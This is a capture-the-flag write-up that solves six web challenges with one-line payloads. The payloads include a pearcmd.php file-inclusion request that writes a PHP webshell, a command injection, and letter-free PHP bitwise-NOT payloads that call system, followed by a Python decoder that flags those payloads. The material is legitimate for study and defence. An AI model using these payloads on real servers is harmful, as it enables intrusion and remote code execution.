Do Something Special
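The challenge is explicit: the location of the flag is given. However, the # character is parsed as a front-end route (the URL fragment), so the flag file is never returned. URL-encoding it is enough to get the flag.
payload:/gr@b_y%23ur_fl@g_h3r3!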
Obsfuscation Isn't Enough
Front-end validation:
'if (document.forms[0].username.value == "83fe2a837a4d4eec61bd47368d86afd6" && document.forms[0].password.value == "a3fa67479e47116a4d6439120400b057") document.location = "150484514b6eeb1d99da836d95f6671d.php"'
We can simply request 150484514b6eeb1d99da836d95f6671d.php directly.
Zero is not the limit
payload:/user/-1
Most Secure Calculator -
payload:cat flag.txt
My PHP Site
The bare file inclusion technique from p神's blog gives a shell directly.
payload:GET /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=system($_GET['cmd'])?>+/tmp/shell.php HTTP/1.1
Most Secure Calculator - 2
Get a shell with a bypass that uses no letters or digits.
payload:equation=(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8); equation=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8B%87%8B);
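To see what the two `equation` values above actually call, and to spot the same encoding when reviewing requests, the following sketch decodes each `(~...)` group by percent-decoding it and flipping every bit. It is an added example, not part of the original write-up; it assumes the raw, still percent-encoded parameter value is available (for example from a proxy or WAF log), and the function names are illustrative.

```python
import re
from urllib.parse import unquote_to_bytes

# Payloads copied verbatim from the write-up (value of the `equation` parameter).
PAGE_PAYLOADS = [
    "(~%8C%86%8C%8B%9A%92)(~%D8%93%8C%D8);",
    "(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8B%87%8B);",
]

# One "(~<percent-encoded bytes>)" group. PHP's ~ on a string flips every bit
# of every byte, so the high bytes sent on the wire become ASCII at runtime.
NOT_GROUP = re.compile(r"\(~((?:%[0-9A-Fa-f]{2})+)\)")


def decode_not_groups(raw_value):
    """Return the string each (~...) group evaluates to, in order."""
    results = []
    for match in NOT_GROUP.finditer(raw_value):
        wire_bytes = unquote_to_bytes(match.group(1))
        results.append(bytes(b ^ 0xFF for b in wire_bytes).decode("latin-1"))
    return results


def looks_like_not_encoding(raw_value):
    """Heuristic: some group inverts to printable ASCII only."""
    return any(
        text and all(0x20 <= ord(ch) <= 0x7E for ch in text)
        for text in decode_not_groups(raw_value)
    )


if __name__ == "__main__":
    for payload in PAGE_PAYLOADS:
        print(payload, "->", decode_not_groups(payload))
    # Constructed benign calculator input for comparison.
    print("(1+2)*3", "->", looks_like_not_encoding("(1+2)*3"))
```

A character filter that only rejects letters and digits never sees the function names, because they exist only after the interpreter applies `~`; the check has to run on the decoded form or the input has to be parsed as arithmetic rather than evaluated.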